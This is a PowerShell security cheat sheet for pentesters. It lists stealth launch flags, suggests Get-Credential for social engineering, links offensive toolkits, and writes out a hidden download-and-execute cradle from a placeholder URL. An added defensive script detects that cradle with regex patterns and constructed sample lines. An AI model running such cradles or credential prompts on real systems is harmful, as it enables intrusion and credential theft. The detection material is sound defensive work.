---
title: Powershell Windows (Security-) Administration
categories: [cheatsheets]
tags: [security, windows]
---

# PowerShell

1) powershell.exe parameters:

```
-Exec Bypass   # allows the execution of scripts
-NoP           # NoProfile: do not load a profile, keep the same/standard environment
-NonI          # Non-interactive mode -> no prompt, just execution of the commands
-W Hidden      # Hide the window
-noexit        # Keeps the shell open (good for keyloggers etc.)
-Command       # Execute a command
```

2) Use PowerShell to get information about the system

```
Get-Hotfix       # checks Windows patches
Get-Service      # print all services
Get-Process      # print all processes
Get-Credential   # Nice login field for social engineering
```

3) Load scripts from a web server and execute them (inline and in-memory)

```
powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command IEX (New-Object Net.WebClient).DownloadString('http://URL/script.ps1');
```

**Important:** Never use unknown code from the internet for a client!

4) Some PowerShell scripts for pentesters

* https://github.com/cheetz/Easy-P
* https://github.com/PowerShellMafia/PowerSploit
* https://github.com/samratashok/nishang/tree/master/Gather
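
For defenders, the flag combination in item 3 is a useful detection signal. The following is an added example, not part of the original cheat sheet: it scores process command lines (for instance from process-creation auditing with command-line logging, which is an assumption about the log source) for the parameters listed in item 1 and the download-and-execute pair from item 3. The function names are hypothetical, the sample command lines are constructed, and `example.test` is a placeholder host.

```powershell
# Added example, not from the original cheat sheet. Function names are hypothetical.

function New-ParamPattern {
    # powershell.exe accepts any unambiguous prefix of a parameter name (-NoP = -NoProfile),
    # so build one regex covering every prefix of $Name that is at least $MinLength long.
    param([string]$Name, [int]$MinLength, [string]$Value = '', [string[]]$Alias = @())
    $names   = @($Alias) + @(($Name.Length)..$MinLength | ForEach-Object { $Name.Substring(0, $_) })
    $pattern = '(?i)(?<![\w-])-(?:' + ($names -join '|') + ')(?![\w-])'
    if ($Value) { $pattern += '\s+["'']?' + $Value + '\b' }
    $pattern
}

$Indicators = [ordered]@{
    ExecBypass     = New-ParamPattern -Name ExecutionPolicy -MinLength 2 -Value Bypass -Alias ep
    NoProfile      = New-ParamPattern -Name NoProfile       -MinLength 3
    NonInteractive = New-ParamPattern -Name NonInteractive  -MinLength 3
    HiddenWindow   = New-ParamPattern -Name WindowStyle     -MinLength 1 -Value Hidden
    InvokeExpr     = '(?i)\b(?:IEX|Invoke-Expression)\b'
    WebDownload    = '(?i)\bDownloadString\s*\('
}

function Test-DownloadCradle {
    param([Parameter(Mandatory)][string]$CommandLine)
    $hits = @($Indicators.Keys | Where-Object { $CommandLine -match $Indicators[$_] })
    [pscustomobject]@{
        # Fetch (DownloadString) plus execute (IEX) in one command line is the strong signal.
        Cradle       = ($hits -contains 'InvokeExpr') -and ($hits -contains 'WebDownload')
        # The launch flags also appear in legitimate admin jobs, so they only add weight.
        StealthFlags = @($hits | Where-Object { $_ -notin 'InvokeExpr', 'WebDownload' }).Count
        Hits         = $hits -join ','
    }
}

# Constructed sample command lines
$samples = @(
    "powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command IEX (New-Object Net.WebClient).DownloadString('http://example.test/script.ps1');"
    'powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1'
    'powershell.exe -Command "Get-HotFix | Sort-Object InstalledOn"'
)
$samples | ForEach-Object { Test-DownloadCradle -CommandLine $_ } | Format-Table -AutoSize
```

Command-line matching does not see content passed through `-EncodedCommand`; PowerShell Script Block Logging (event ID 4104) records the script text that actually runs.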